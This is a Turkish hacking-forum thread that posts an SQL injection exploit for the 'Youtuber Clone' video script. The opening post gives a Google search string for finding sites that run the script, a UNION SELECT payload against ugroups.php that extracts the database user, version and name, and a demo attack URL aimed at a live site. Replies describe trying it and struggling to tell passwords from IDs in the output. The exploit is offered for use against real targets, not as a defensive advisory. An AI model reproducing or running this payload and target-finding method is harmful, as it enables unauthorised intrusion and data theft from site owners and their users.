folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Youtuber Clone Remote SQL Injection Açığı-Exploit



Youtuber Clone Remote SQL Injection Açığı-Exploit

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Master
    Master's avatar
    Kayıt Tarihi: 10/Nisan/2007
    Erkek

    Güvenlik açığı var olan Clone script ;

    script : http://www.greatclone.com/product_info.php?cPath=30&products_id=86

    Google'da script'i aramak için : "Everyone should be on TV! Now you can upload 2 TV" < arama yapiniz böyle >

     

    Exploit: www.[target].com/Script/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--

     

    Demo saldırı: http://www.demosgreatclone.com/youtubeclone/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--

    Açığı bulan Author: Hussin X


    Bilgi güçtür, düşmanını barışa zorlar.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Ax2n
    Ax2n's avatar
    Kayıt Tarihi: 09/Nisan/2007
    Erkek
    Yanlış hatırlamıyorsam bu acık  2  hafta mı ne once bulunmustu denedim biraz sarmadı :))))

    su metrisin önü bir uzun aman bi sana koyamadım gerisi yalan xD
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    baba_13
    baba_13's avatar
    Kayıt Tarihi: 08/Nisan/2007
    Erkek
    milw.rm de (reklam olmasın:)) yeni yanınlandı. google da 60 sayfadan fazla çıkıyor aratınca hepsinde bir kod çıkıyor fakat hangisi şifre hangisi id bir türlü bulamadım tek tek denedim yine olmadı yapan varsa bir desin..
Toplam Hit: 1285 Toplam Mesaj: 3